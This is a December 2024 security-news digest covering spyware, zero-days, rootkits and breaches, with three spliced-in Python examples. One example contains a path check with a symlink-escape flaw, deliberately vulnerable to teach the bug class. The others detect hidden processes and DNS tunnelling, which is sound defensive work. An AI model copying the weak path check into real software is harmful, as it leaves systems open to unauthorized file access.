    Experts discovered the first mobile malware families linked to Russia’s Gamaredon

    exploits
    2024-12-13 https://securityaffairs.com/171949/apt/gamaredon-used-two-new-android-spyware-tools.html
    The Russia-linked APT Gamaredon used two new Android spyware tools called BoneSpy and PlainGnome against former Soviet states. Lookout researchers linked the BoneSpy and PlainGnome Android surveillance families to the Russian APT group Gamaredon (a.k.a. Armageddon, Primitive Bear, and ACTINIUM). These are the first known mobile malware families linked to the Russian APT. The cyberespionage group is behind a […]

    Autosummary: The exact mechanism by which the malware-laced apps are distributed remains unclear, but it is suspected to involve targeted social engineering, with the apps masquerading as battery charge monitoring apps, photo gallery apps, a fake Samsung Knox app, and a fully functional but trojanized Telegram app. The two malware families can collect data such as SMS messages, call logs, phone call audio, photos from device cameras, device location, and contact lists.


    Milei, Musk and Maga: Is Argentina influencing the US?

    latam
    2024-12-13 https://www.bbc.com/news/articles/c5y86vv0wneo
    As Argentina's libertarian President Javier Milei marks one year in office, his policies are keenly observed in the US.

    Autosummary: [Image: plans to privatise Aerolineas Argentinas are part of Milei's cost-cutting drive (Source: Reuters)] Marcelo J García, Buenos Aires-based director for the Americas at global consulting firm Horizon Engage, says Milei's decision to wield a chainsaw on the campaign trail as a sign of his approach to government was a "masterpiece" of political marketing that has "captured the imagination of small-state activists across the globe". Meanwhile, tech billionaire Elon Musk, who looks set to play a key role in the incoming US administration, has also praised Milei, saying Argentina is "experiencing a giant improvement" under his leadership.


    Bolivia extradites former anti-drugs chief to US on drug trafficking charges

    latam
    2024-12-13 https://www.bbc.com/news/articles/cdd6epp1662o
    Maximiliano Dávila is accused of facilitating cocaine smuggling to the United States.

    Autosummary: "Bolivians are handed over to the North American Empire, violating international agreements, without first being tried in their homeland where they supposedly committed crimes", he added.


    WordPress Hunk Companion Plugin Flaw Exploited to Silently Install Vulnerable Plugins

    exploits
    2024-12-12 https://thehackernews.com/2024/12/wordpress-hunk-companion-plugin-flaw.html
    Malicious actors are exploiting a critical vulnerability in the Hunk Companion plugin for WordPress to install other vulnerable plugins that could open the door to a variety of attacks. The flaw, tracked as CVE-2024-11972 (CVSS score: 9.8), affects all versions of the plugin prior to 1.9.0. The plugin has over 10,000 active installations. "This flaw poses a significant security risk, as it …

    Autosummary: "This flaw poses a significant security risk, as it enables attackers to install vulnerable or closed plugins, which can then be exploited for attacks such as Remote Code Execution (RCE), SQL Injection, Cross‑Site Scripting (XSS), or even the creation of administrative backdoors," WPScan said in a report.


    Krispy Kreme cybersecurity incident disrupts online ordering

    ciber
    2024-12-12 https://www.helpnetsecurity.com/2024/12/12/krispy-kreme-cybersecurity-incident-disrupts-online-ordering/

    Popular US doughnut chain Krispy Kreme has been having trouble with its online ordering system as well as digital payments at their brick-and-mortar shops since late November, and now we finally know why: an 8-K report filed with the US Securities and Exchange Commission (SEC) has revealed that the company has suffered a “cybersecurity incident”. The company was notified about unauthorized activity on a portion of its information technology systems on November 29, 2024, and …



    Gamaredon Deploys Android Spyware "BoneSpy" and "PlainGnome" in Former Soviet States

    government
    2024-12-12 https://thehackernews.com/2024/12/gamaredon-deploys-android-spyware.html
    The Russia-linked state-sponsored threat actor tracked as Gamaredon has been attributed to two new Android spyware tools called BoneSpy and PlainGnome, marking the first time the adversary has been discovered using mobile-only malware families in its attack campaigns. "BoneSpy and PlainGnome target former Soviet states and focus on Russian-speaking victims," Lookout said in an analysis. "Both …

    Autosummary: Gamaredon, also called Aqua Blizzard, Armageddon, BlueAlpha, Hive0051, Iron Tilden, Primitive Bear, Shuckworm, Trident Ursa, UAC-0010, UNC530, and Winterflounder, is a hacking group affiliated with Russia's Federal Security Service (FSB).


    Researchers Uncover Symlink Exploit Allowing TCC Bypass in iOS and macOS

    exploits
    2024-12-12 https://thehackernews.com/2024/12/researchers-uncover-symlink-exploit.html
    Details have emerged about a now-patched security vulnerability in Apple's iOS and macOS that, if successfully exploited, could sidestep the Transparency, Consent, and Control (TCC) framework and result in unauthorized access to sensitive information. The flaw, tracked as CVE-2024-44131 (CVSS score: 5.3), resides in the FileProvider component, per Apple, and has been addressed with improved …

    Autosummary: The flaw, tracked as CVE-2024-44131 (CVSS score: 5.3), resides in the FileProvider component, per Apple, and has been addressed with improved validation of symbolic links (symlinks) in iOS 18, iPadOS 18, and macOS Sequoia 15.
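    The fix Apple describes, "improved validation of symbolic links", points at the general bug class: a permission check that validates only the lexical path of a file can be defeated by a symlink planted inside the permitted directory that points outside it. The added example below is neither Apple's code nor the reported exploit; it contrasts the vulnerable lexical check with a check that resolves symlinks before deciding. The sandbox directory, the secret file and the planted link are created in a temporary directory purely for the demonstration.

```python
"""Added example: lexical path check vs. symlink-resolving containment check.
The sandbox/secret layout is constructed in a temp directory for the demo."""
import os
import tempfile


def naive_path(base: str, relative: str) -> str:
    """Vulnerable pattern: only the lexical path is checked, so a symlink that
    lives inside `base` but points outside it is followed without complaint."""
    candidate = os.path.normpath(os.path.join(base, relative))
    if not candidate.startswith(os.path.join(base, "")):
        raise PermissionError(f"{relative!r} escapes {base!r}")
    return candidate


def hardened_path(base: str, relative: str) -> str:
    """Resolve every symlink first, then require the result to stay under base."""
    base_real = os.path.realpath(base)
    candidate = os.path.realpath(os.path.join(base_real, relative))
    if os.path.commonpath([base_real, candidate]) != base_real:
        raise PermissionError(f"{relative!r} resolves to {candidate!r}, outside {base_real!r}")
    return candidate


def demo() -> tuple:
    """Plant sandbox/innocent.txt -> ../secret.txt and try both checks.

    Returns (what the naive check let us read, whether the hardened check refused).
    """
    with tempfile.TemporaryDirectory() as tmp:
        base = os.path.join(tmp, "sandbox")
        os.mkdir(base)
        secret = os.path.join(tmp, "secret.txt")  # deliberately outside the sandbox
        with open(secret, "w") as fh:
            fh.write("top secret")
        # attacker-controlled link inside the permitted directory
        os.symlink(secret, os.path.join(base, "innocent.txt"))

        with open(naive_path(base, "innocent.txt")) as fh:
            leaked = fh.read()  # lexical check passes, file outside base is read

        try:
            hardened_path(base, "innocent.txt")
            refused = False
        except PermissionError:
            refused = True
        return leaked, refused


if __name__ == "__main__":
    leaked, refused = demo()
    print(f"naive check leaked: {leaked!r}; hardened check refused: {refused}")
```

The realpath check is still a check-then-use: an attacker who can swap the link between the check and the open wins the race, so on the open itself prefer `O_NOFOLLOW` or an `openat`-style walk that refuses links at each component.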


    Cleo patches critical zero-day exploited in data theft attacks

    exploits
    2024-12-12 https://www.bleepingcomputer.com/news/security/cleo-patches-critical-zero-day-exploited-in-data-theft-attacks/
    Cleo has released security updates for a zero-day flaw in its LexiCom, VLTrader, and Harmony software, currently exploited in data theft attacks. [...]

    Autosummary: "Cleo strongly advises all customers to immediately upgrade instances of Harmony, VLTrader, and LexiCom to the latest released patch (version 5.8.0.24) to address additional discovered potential attack vectors of the vulnerability," the company said.


    Spain busts voice phishing ring for defrauding 10,000 bank customers

    financial
    2024-12-12 https://www.bleepingcomputer.com/news/security/spain-busts-voice-phishing-ring-for-defrauding-10-000-bank-customers/
    The Spanish police, working with colleagues in Peru, conducted a simultaneous crackdown on a large-scale voice phishing (vishing) scam ring in the two countries, arresting 83 individuals. [...]



    Bitcoin ATM firm Byte Federal hacked via GitLab flaw, 58K users exposed

    financial
    2024-12-12 https://www.bleepingcomputer.com/news/security/bitcoin-atm-firm-byte-federal-hacked-via-gitlab-flaw-58k-users-exposed/
    US Bitcoin ATM operator Byte Federal has disclosed a data breach that exposed the data of 58,000 customers after its systems were breached using a GitLab vulnerability. [...]

    Autosummary: The notice underlines that no user funds or digital assets were compromised in this breach, but the attackers accessed the following sensitive information: full name, date of birth, physical address, phone number, email address, government-issued ID, Social Security number (SSN), transaction activity, and user photographs. The above information is particularly sensitive and very revealing for cryptocurrency holders, potentially putting them at risk of SIM swap attacks, account takeovers, or other targeted phishing attacks.


    Cleo patches zero-day exploited by ransomware gang

    exploits ransomware
    2024-12-12 https://www.helpnetsecurity.com/2024/12/12/cleo-patches-zero-day-exploited-by-ransomware-gang/

    Cleo has released a security patch to address the critical vulnerability that started getting exploited while still a zero-day to breach internet-facing Cleo Harmony, VLTrader, and LexiCom instances. Version 5.8.0.24 of the three products, which was pushed out on Wednesday, plugs the hole that allowed attackers into vulnerable installations, where they moved to establish a reverse shell connection to their servers and perform reconnaissance. Huntress researcher John Hammond confirmed that the patch is effective at …


    Autosummary: The post-exploitation framework deletes the first-stage payload (downloader); sends status updates to the C2 server; allows operators to read and collect files or directories; allows operators to retrieve Cleo configuration files (for information about the installation) and issue execution commands; and allows operators to perform basic read and write operations on the filesystem. [Figure: attack flow (Source: Rapid7)] After initial exploitation, Rapid7 researchers have also observed the attacker executing commands aimed at gathering user, group and system information from the impacted system and displaying domain trust relationships, and executing an overpass-the-hash attack to create a valid Kerberos ticket and thus gain access to additional network resources within the impacted environment.


    Bolivian shamans refuse to leave shacks on deadly cliff edge

    latam
    2024-12-12 https://www.bbc.com/news/videos/c20nzepj6kro
    Locals call the shacks "suicide homes", with authorities planning a forced evacuation if necessary.



    Meet Karol G, Colombia's Taylor Swift

    latam
    2024-12-12 https://www.bbc.com/news/articles/ckg3dl757w6o
    The Colombian singer is the world's most-watched artist when it comes to streamed videos.

    Autosummary: While she is widely reported to be both hardworking and ambitious, Rocío Guerrero, head of Latin music at Amazon Music, says that the singer – and Latin music in general – have been greatly helped by the rise of streaming, both the music and the accompanying videos. "And reggaeton is super danceable, it's super consumable, it's super youth oriented," adds Ms Cobo, who is the author of a book on Latin music. Meanwhile, in the US, Latin music is now the fastest-growing genre, hitting a record $1.4bn (£1.1bn) in venues last year, according to the Recording Industry Association of America (RIAA).


    New stealthy Pumakit Linux rootkit malware spotted in the wild

    exploits Linux
    2024-12-12 https://www.bleepingcomputer.com/news/security/new-stealthy-pumakit-linux-rootkit-malware-spotted-in-the-wild/
    A new Linux rootkit malware called Pumakit has been discovered that uses stealth and advanced privilege escalation techniques to hide its presence on systems. [...]

    Autosummary: It intercepts user-level system calls and alters the behavior of tools like ls, ps, netstat, top, htop, and cat to hide files, processes, and network connections associated with the rootkit. It can also dynamically hide any other files and directories based on attacker-defined criteria and make malicious binaries entirely invisible to users and system admins.
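    A rootkit that hooks the user-level calls behind ls, ps and netstat has to lie consistently, and a cheap way to catch an inconsistency is to compare what a readdir()-based listing of /proc reports with what the kernel admits to when each PID is probed directly with kill(pid, 0). The added example below is not taken from the Pumakit analysis or from the malware; it is a generic hidden-process check, written for Linux. It only catches a hook on the listing path, because a kernel-module rootkit can lie to kill() as well, and probing every PID up to pid_max takes several seconds in Python.

```python
"""Added example: find PIDs the kernel answers for but a /proc listing omits.
Linux-only; a kernel-side rootkit that also hooks kill() will not be caught."""
import os


def listed_pids(proc_root: str = "/proc") -> set:
    """PIDs a readdir()-based listing reports (the view ls, ps and top get).
    A userland hook on readdir() can silently filter entries out of this set."""
    try:
        return {int(name) for name in os.listdir(proc_root) if name.isdigit()}
    except FileNotFoundError:  # not a Linux /proc host
        return set()


def probed_pids(max_pid: int) -> set:
    """PIDs that exist according to kill(pid, 0). EPERM still means 'exists';
    only ESRCH means 'no such process'. This never touches the readdir() path."""
    found = set()
    for pid in range(1, max_pid + 1):
        try:
            os.kill(pid, 0)
        except ProcessLookupError:
            continue
        except PermissionError:
            pass
        found.add(pid)
    return found


def hidden_pids(listed: set, probed: set) -> list:
    """Pure comparison, so it can be tested with constructed sets."""
    return sorted(probed - listed)


def pid_max(path: str = "/proc/sys/kernel/pid_max", default: int = 32768) -> int:
    """Upper bound for the probe; falls back to the classic default off-Linux."""
    try:
        with open(path) as fh:
            return int(fh.read().strip())
    except (FileNotFoundError, ValueError):
        return default


def self_is_probed() -> bool:
    """Sanity check: the current process must show up in the probe."""
    return os.getpid() in probed_pids(os.getpid())


def scan() -> list:
    """Probe first, then list, so a process that starts mid-scan is not a false hit.
    A process that exits in between still is, so confirm each hit by re-reading
    /proc/<pid>/status before raising an alarm."""
    probed = probed_pids(pid_max())
    return hidden_pids(listed_pids(), probed)


if __name__ == "__main__":
    for pid in scan():
        print(f"pid {pid} is alive but missing from /proc listing")
```

Run it as root from a known-good static binary or a rescue environment where possible; a rootkit that hooks libc in every process on the box also hooks the Python interpreter's readdir(), which is exactly the discrepancy this check is built to expose.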


    New IOCONTROL malware used in critical infrastructure attacks

    exploits
    2024-12-12 https://www.bleepingcomputer.com/news/security/new-iocontrol-malware-used-in-critical-infrastructure-attacks/
    Iranian threat actors are utilizing a new malware named IOCONTROL to compromise Internet of Things (IoT) devices and OT/SCADA systems used by critical infrastructure in Israel and the United States. [...]

    Autosummary: The malware's modular nature makes it capable of compromising a broad spectrum of devices from various manufacturers, including D-Link, Hikvision, Baicells, Red Lion, Orpak, Phoenix Contact, Teltonika, and Unitronics. [Image: Gasboy fuel control system from which the malware was extracted (Source: Claroty)] The malware, which is stored in the "/usr/bin/" directory under the name "iocontrol", uses a modular configuration to adapt to different vendors and device types, targeting a broad spectrum of system architectures.


    US Bitcoin ATM operator Byte Federal suffered a data breach

    financial
    2024-12-12 https://securityaffairs.com/171941/data-breach/us-bitcoin-atm-operator-byte-federal-suffered-a-data-breach.html
    US Bitcoin ATM operator Byte Federal suffered a data breach impacting 58,000 customers; attackers gained unauthorized access to a server via a GitLab flaw. US Bitcoin ATM operator Byte Federal disclosed a data breach after threat actors gained unauthorized access to a company server by exploiting a GitLab vulnerability. Byte Federal is a company specializing in […]

    Autosummary: Potentially compromised customer personal information includes name, birthdate, address, phone number, email address, government-issued ID, Social Security number, transaction activity, and photographs of users.


    Open source malware up 200% since 2023

    exploits
    2024-12-11 https://www.helpnetsecurity.com/2024/12/11/open-source-malware/

    Sonatype’s 2024 Open Source Malware Threat Report reveals that the number of malicious packages has surpassed 778,500 since tracking began in 2019. In 2024, researchers examined how threat actors leverage malicious open-source packages to target developers, particularly as enterprises increasingly adopt open-source tools to build custom AI models. [Chart: Source: Sonatype] Open source malware thrives in ecosystems with low entry barriers, no author verification, high usage, and diverse users. Platforms like npm and PyPI, which handle …



    Cato Networks extends SASE-based protection to IoT/OT environments

    industry
    2024-12-11 https://www.helpnetsecurity.com/2024/12/11/cato-iot-ot-security/

    With the introduction of Cato IoT/OT Security, Cato Networks is enabling enterprises to simplify the management and security of Internet of Things (IoT) and operational technology (OT) devices. Cato IoT/OT Security converges device discovery and classification, policy enforcement, and threat prevention in a SASE platform. Cato IoT/OT Security is a native feature in the Cato SASE Cloud Platform, which allows enterprises to instantly activate the new solution with a click of a button. There is …


    Autosummary: “Additionally, IoT devices are often less secure by design, while OT systems in critical infrastructure are generally challenging to patch,” said John Grady, principal analyst, network security and web application security at ESG. Enterprises require an IoT/OT security solution that provides discovery, visibility, policy enforcement, and threat prevention for IoT/OT devices.


    CyTwist’s detection engine combats AI-generated malware

    exploits
    2024-12-11 https://www.helpnetsecurity.com/2024/12/11/cytwist-malware-detection-engine/

    CyTwist launches its patented detection engine to combat the insidious rise of AI-generated malware. Enhancing an organization’s existing security stack, CyTwist’s solution profiles threat actors using field-proven counterintelligence methodologies and hyper-targeted probability algorithms, resulting in detection of a suspected attack within minutes. Validated by a red team live attack simulation with a prominent telecoms provider, mirrored on the September 2024 attack against French government agencies and private companies, CyTwist’s platform’s results are unambiguous – successfully …


    Autosummary: During the simulated attack, which was modeled on the French incident, the AI-engineered malware employed advanced techniques and encryption to elude signature-based and rule-driven tools.


    Microsoft Fixes 72 Flaws, Including Patch for Actively Exploited CLFS Vulnerability

    exploits
    2024-12-11 https://thehackernews.com/2024/12/microsoft-fixes-72-flaws-including.html
    Microsoft closed out its Patch Tuesday updates for 2024 with fixes for a total of 72 security flaws spanning its software portfolio, including one that it said has been exploited in the wild. Of the 72 flaws, 17 are rated Critical, 54 are rated Important, and one is rated Moderate in severity. Thirty-one of the vulnerabilities are remote code execution flaws, and 27 of them allow for the …

    Autosummary: Also of note are three other remote code execution flaws impacting Windows Hyper-V (CVE-2024-49117, CVSS score: 8.8), Remote Desktop Client (CVE-2024-49105, CVSS score: 8.4), and Microsoft Muzic (CVE-2024-49063, CVSS score: 8.4). "Though in-the-wild exploitation details aren't known yet, looking back at the history of CLFS driver vulnerabilities, it is interesting to note that ransomware operators have developed a penchant for exploiting CLFS elevation of privilege flaws over the last few years," Satnam Narang, senior staff research engineer at Tenable, told The Hacker News.


    U.S. Charges Chinese Hacker for Exploiting Zero-Day in 81,000 Sophos Firewalls

    exploits
    2024-12-11 https://thehackernews.com/2024/12/us-charges-chinese-hacker-for.html
    The U.S. government on Tuesday unsealed charges against a Chinese national for allegedly breaking into thousands of Sophos firewall devices globally in 2020. Guan Tianfeng (aka gbigmao and gxiaomao), who is said to have worked at Sichuan Silence Information Technology Company, Limited, has been charged with conspiracy to commit computer fraud and conspiracy to commit wire fraud. Guan has been …

    Autosummary: It happened a second time in March 2022 when the company received yet another report from an anonymous China-based researcher detailing two separate flaws: CVE-2022-1040 (CVSS score: 9.8), a critical authentication bypass flaw in Sophos firewalls that allows a remote attacker to execute arbitrary code, and CVE-2022-1292 (CVSS score: 9.8), a command injection bug in OpenSSL. The in-the-wild exploitation of CVE-2022-1040 has been assigned the moniker Personal Panda.


    Chinese EagleMsgSpy Spyware Found Exploiting Mobile Devices Since 2017

    exploits
    2024-12-11 https://thehackernews.com/2024/12/chinese-eaglemsgspy-spyware-found.html
    Cybersecurity researchers have discovered a novel surveillance program that's suspected to be used by Chinese police departments as a lawful intercept tool to gather a wide range of information from mobile devices. The Android tool, codenamed EagleMsgSpy by Lookout, has been operational since at least 2017, with artifacts uploaded to the VirusTotal malware scanning platform as recently as …

    Autosummary: The Hacker News also identified multiple patent applications filed by Wuhan ZRTZ Information Technology Co, Ltd. that delve into the various methods which can be used to "collect and analyze client data such as data of certain types like call record of the suspect's mobile phone, short messages, an address book, instant chat software (QQ, WeChat, Momo, etc.) and so forth, and generate a relationship diagram between the suspect and others."


    Researchers Uncover Espionage Tactics of China-Based APT Groups in Southeast Asia

    industry
    2024-12-11 https://thehackernews.com/2024/12/researchers-uncover-espionage-tactics.html
    A suspected China-based threat actor has been linked to a series of cyber attacks targeting high-profile organizations in Southeast Asia since at least October 2023. The espionage campaign targeted organizations in various sectors spanning government ministries in two different countries, an air traffic control organization, a telecoms company, and a media outlet, the Symantec Threat Hunter Team …

    Autosummary: The attacks, which leveraged tools previously identified as linked to China-based advanced persistent threat (APT) groups, are characterized by the use of both open-source and living-off-the-land (LotL) techniques.


    Lynx ransomware behind Electrica energy supplier cyberattack

    exploits ransomware industry ciber
    2024-12-11 https://www.bleepingcomputer.com/news/security/lynx-ransomware-behind-electrica-energy-supplier-cyberattack/
    The Romanian National Cybersecurity Directorate (DNSC) says the Lynx ransomware gang breached Electrica Group, one of the largest electricity suppliers in the country. [...]

    Autosummary: [Image: INC vs Lynx ransomware string comparison (Source: BleepingComputer)] Since it emerged as a ransomware-as-a-service (RaaS) operation in July 2023, INC Ransom has also breached many education, healthcare, government, and industrial entities, including Yamaha Motor Philippines, Scotland's National Health Service (NHS), and the U.S. division of Xerox Business Solutions (XBS).


    Krispy Kreme cyberattack impacts online orders and operations

    ciber
    2024-12-11 https://www.bleepingcomputer.com/news/security/krispy-kreme-cyberattack-impacts-online-orders-and-operations/
    US doughnut chain Krispy Kreme suffered a cyberattack in November that impacted portions of its business operations, including placing online orders. [...]

    Autosummary: "On November 29, 2024, Krispy Kreme, Inc. was notified regarding unauthorized activity on a portion of its information technology systems," reads the filing.


    Secret Blizzard Deploys Kazuar Backdoor in Ukraine Using Amadey Malware-as-a-Service

    exploits
    2024-12-11 https://thehackernews.com/2024/12/secret-blizzard-deploys-kazuar-backdoor.html
    The Russian nation-state actor tracked as Secret Blizzard has been observed leveraging malware associated with other threat actors to deploy a known backdoor called Kazuar on target devices located in Ukraine. The new findings come from the Microsoft threat intelligence team, which said it observed the adversary leveraging the Amadey bot malware to download custom malware onto "specifically …

    Autosummary: Secret Blizzard has a track record of targeting various sectors to facilitate long-term covert access for intelligence collection, but their primary focus is on ministries of foreign affairs, embassies, government offices, defense departments, and defense-related companies across the world.


    New Malware Technique Could Exploit Windows UI Framework to Evade EDR Tools

    exploits
    2024-12-11 https://thehackernews.com/2024/12/new-malware-technique-could-exploit.html
    A newly devised technique leverages a Windows accessibility framework called UI Automation (UIA) to perform a wide range of malicious activities without tipping off endpoint detection and response (EDR) solutions. "To exploit this technique, a user must be convinced to run a program that uses UI Automation," Akamai security researcher Tomer Peled said in a report shared with The Hacker News.

    Autosummary: Akamai's research found that this approach could also open up an avenue for abuse, allowing malicious actors to read/write messages, steal data entered in websites (e.g., payment information), and execute commands that redirect victims to malicious websites when a currently displayed web page in a browser refreshes or changes. The attack "allows the writing of custom DLLs to a target machine, loading them to a service, and executing their functionality with arbitrary parameters," security researcher Eliran Nissan said.


    ZLoader Malware Returns With DNS Tunneling to Stealthily Mask C2 Comms

    exploits
    2024-12-11 https://thehackernews.com/2024/12/zloader-malware-returns-with-dns.html
    Cybersecurity researchers have discovered a new version of the ZLoader malware that employs a Domain Name System (DNS) tunnel for command-and-control (C2) communications, indicating that the threat actors are continuing to refine the tool after resurfacing a year ago. "Zloader 2.9.4.0 adds notable improvements including a custom DNS tunnel protocol for C2 communications and an interactive shell …

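    DNS tunneling leaves a fingerprint in resolver logs even when the payload inside is encrypted: one apex domain receives many unique, long, high-entropy leading labels, often as TXT queries, from a small number of clients. The added example below is not taken from the ZLoader analysis and does not reproduce Zloader's own tunnel protocol; it scores a constructed resolver log (the apex c2-example.test, the client addresses and the encoded labels are all made up) on label length, entropy and uniqueness per apex, and flags an apex only when every threshold is exceeded.

```python
"""Added example: flag DNS-tunnel style query patterns in resolver logs.
The log lines are constructed; c2-example.test is a made-up apex, not an IOC."""
import math
import random
from collections import defaultdict


def shannon_entropy(s: str) -> float:
    """Bits per character: random hex sits near 4.0, ordinary hostnames near 2-3."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def apex_domain(qname: str) -> str:
    """Crude registrable-domain guess: last two labels (use a public suffix list in production)."""
    labels = qname.rstrip(".").split(".")
    return ".".join(labels[-2:])


def parse_log(text: str):
    """Yield (client, qtype, qname) from 'timestamp client qtype qname' lines."""
    for line in text.strip().splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # skip malformed lines rather than crash the pipeline
        _ts, client, qtype, qname = parts
        yield client, qtype, qname.lower()


def score_apexes(records, min_queries=10, min_len=25, min_entropy=3.5, min_uniq_ratio=0.9) -> dict:
    """Aggregate per apex; flag apexes whose leading labels look like encoded data."""
    stats = defaultdict(lambda: {"queries": 0, "uniq": set(), "len": 0.0, "ent": 0.0, "txt": 0})
    for _client, qtype, qname in records:
        first = qname.split(".")[0]          # the label a tunnel stuffs data into
        s = stats[apex_domain(qname)]
        s["queries"] += 1
        s["uniq"].add(qname)
        s["len"] += len(first)
        s["ent"] += shannon_entropy(first)
        s["txt"] += int(qtype == "TXT")
    flagged = {}
    for apex, s in stats.items():
        n = s["queries"]
        avg_len, avg_ent, uniq = s["len"] / n, s["ent"] / n, len(s["uniq"]) / n
        if n >= min_queries and avg_len >= min_len and avg_ent >= min_entropy and uniq >= min_uniq_ratio:
            flagged[apex] = {"queries": n, "avg_label_len": round(avg_len, 1),
                             "avg_entropy": round(avg_ent, 2), "txt": s["txt"]}
    return flagged


def build_sample_log(seed: int = 7) -> str:
    """Constructed resolver log: 20 benign lookups plus 30 tunnel-style TXT queries."""
    rng = random.Random(seed)
    lines = []
    benign = ["www.example.com", "mail.example.com", "cdn.example.net", "api.example.org", "www.example.com"]
    for i, name in enumerate(benign * 4):
        lines.append(f"1733900000.{i:03d} 10.0.0.5 A {name}")
    for i in range(30):
        blob = "".join(rng.choice("0123456789abcdef") for _ in range(40))  # fake encoded chunk
        lines.append(f"1733900100.{i:03d} 10.0.0.7 TXT {blob}.c2-example.test")
    return "\n".join(lines)


def analyze(text: str) -> dict:
    return score_apexes(parse_log(text))


if __name__ == "__main__":
    for apex, info in analyze(build_sample_log()).items():
        print(apex, info)
```

Tune the thresholds against your own baseline first: CDNs, anti-spam services and some EDR agents legitimately generate long encoded labels, so feed known-good apexes into an allowlist before alerting on the rest.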


    Russian cyber spies hide behind other hackers to target Ukraine

    rusia-ucrania
    2024-12-11 https://www.bleepingcomputer.com/news/security/russian-cyber-spies-hide-behind-other-hackers-to-target-ukraine/
    Russian cyber-espionage group Turla, aka "Secret Blizzard," is utilizing other threat actors' infrastructure to target Ukrainian military devices connected via Starlink. [...]

    Autosummary: One of the tools Tavdig loads on compromised devices is KazuarV2, Turla's more advanced, stealthy backdoor, designed for long-term intelligence collection, command execution, and data exfiltration.


    Hunk Companion WordPress plugin exploited to install vulnerable plugins

    exploits
    2024-12-11 https://www.bleepingcomputer.com/news/security/hunk-companion-wordpress-plugin-exploited-to-install-vulnerable-plugins/
    Hackers are exploiting a critical vulnerability in the "Hunk Companion" plugin to install and activate other plugins with exploitable flaws directly from the WordPress.org repository. [...]

    Autosummary: By installing outdated plugins that have known vulnerabilities with available exploits, the attackers gain access to a large pool of flaws that lead to remote code execution (RCE), SQL injection, or cross-site scripting (XSS), or let them create backdoor admin accounts.


    Ivanti fixed a maximum severity vulnerability in its CSA solution

    exploits
    2024-12-11 https://securityaffairs.com/171850/breaking-news/ivanti-maximum-severity-flaw-csa-solution.html
    Ivanti addressed a critical authentication bypass vulnerability impacting its Cloud Services Appliance (CSA) solution. Ivanti addressed a critical authentication bypass vulnerability, tracked as CVE-2024-11639 (CVSS score of 10), in its Cloud Services Appliance (CSA) solution. A remote unauthenticated attacker can exploit the vulnerability to gain administrative access. The vulnerability was discovered by CrowdStrike’s Advanced Research […]

    Autosummary: In early October, the software company warned of three new security vulnerabilities (CVE-2024-9379, CVE-2024-9380, and CVE-2024-9381) in its Cloud Service Appliance (CSA) that are actively exploited in attacks in the wild.


    Cybercriminals Impersonate Dubai Police to Defraud Consumers in the UAE – Smishing Triad in Action

    financial ciber
    2024-12-11 https://securityaffairs.com/171859/cyber-crime/smishing-triad-cybercriminals-impersonate-dubai-police.html
    Resecurity uncovered a large-scale fraud campaign in the UAE where scammers impersonate law enforcement to target consumers. Resecurity has identified a wide-scale fraudulent campaign targeting consumers in the UAE by impersonating law enforcement. Victims are asked to pay non-existent fines online (traffic tickets, parking violations, driving license renewals) following multiple phone calls made on behalf […]

    Autosummary: Previously, Resecurity described multiple episodes of Smishing Triad activity targeting online banking, e-commerce and payment systems customers in other geographies including the USA, EU, UK, Pakistan, India, UAE and KSA. According to a recent Strategic Analysis Report released by the UAE Financial Intelligence Unit (UAEFIU), fraud, particularly in the UAE, remains a major risk, contributing to money laundering activities, with an estimated financial loss of AED 1.2 billion (equal to USD 326 million) between 2021 and 2023.


    U.S. CISA adds Microsoft Windows CLFS driver flaw to its Known Exploited Vulnerabilities catalog

    exploits
    2024-12-11 https://securityaffairs.com/171851/hacking/u-s-cisa-adds-microsoft-windows-clfs-driver-flaw-to-its-known-exploited-vulnerabilities-catalog.html
    U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Microsoft Windows Common Log File System (CLFS) driver flaw to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the Microsoft Windows Common Log File System (CLFS) driver flaw CVE-2024-49138 (CVSS score: 7.8) to its Known Exploited Vulnerabilities (KEV) catalog. Microsoft December 2024 […]



    Strengthening security posture with comprehensive cybersecurity assessments

    ciber
    2024-12-10 https://www.helpnetsecurity.com/2024/12/10/phani-dasari-hgs-cybersecurity-assessments/

    In this Help Net Security interview, Phani Dasari, CISO at HGS, discusses key aspects of cybersecurity assessments, including effective tools and methodologies, the role of AI and automation, and strategies for aligning assessments with organizational needs.


    Autosummary: Framework-based assessments, such as those using NIST CSF, ISO 27001, or HIPAA, offer structured methodologies for comprehensive risk management and compliance.


    Cybersecurity jobs available right now: December 10, 2024

    ciber
    2024-12-10 https://www.helpnetsecurity.com/2024/12/10/cybersecurity-jobs-available-right-now-december-10-2024/

    Cloud Security Engineer Sendbird | USA | Hybrid – View job details As a Cloud Security Engineer, you will work with engineering teams to build secure infrastructure at scale, secure multi-account and multi-cloud infrastructure for Sendbird, own CSPM and cloud security tooling while building automations, embed security tools into the CI/CD system for IaC scanning, identify security gaps and develop solutions, and research and identify new attacks targeting Sendbird’s products. Cyber Network Analyst Cynerio | … More

    The post Cybersecurity jobs available right now: December 10, 2024 appeared first on Help Net Security.

    "

    Autosummary: Perform tests and assessments in the cloud, including but not limited to AWS, Azure, GCP, etc. Specialist, Network Security M42 Health | UAE | On-site – View job details As a Specialist, Network Security, you will design, implement, and maintain enterprise network-security infrastructure and multi-cloud platforms, including firewalls, wireless systems, and load balancers. DevOps Security Engineer with DLP Sensation Business Consulting | Canada | On-site – View job details As a DevOps Security Engineer with DLP, you will automate on-prem infrastructure processes to implement and enhance DLP controls, improve DevOps practices within the squad by leveraging Infrastructure as Code, test automation, and CI/CD, and manage a global DLP security infrastructure while working with various security products such as Symantec DLP, Splunk, Microsoft Information Protection, and Netskope. Network Security Specialist TYH Investment | India | Hybrid – View job details As a Network Security Specialist, you will configure, manage, and maintain various firewalls and security solutions, including but not limited to F5, Cisco, Palo Alto, Check Point, and other platforms. "


    SecureAuth protects sensitive information with biometric continuous identity assurance

    ransomware
    2024-12-10 https://www.helpnetsecurity.com/2024/12/10/secureauth-biometric-continuous-identity-assurance/

    SecureAuth is releasing biometric continuous identity assurance (BCIA). This ability is designed to safeguard a company’s sensitive information for the duration of a user’s session — providing additional protection from emerging threats in today’s hybrid and remote work environments. “Not having biometric continuous identity assurance after the initial login authentication creates a critical vulnerability,” said SecureAuth CEO Joseph Dhanapal. “The rest of the session remains unprotected, leaving organizations exposed to unauthorized access and malicious actions. … More

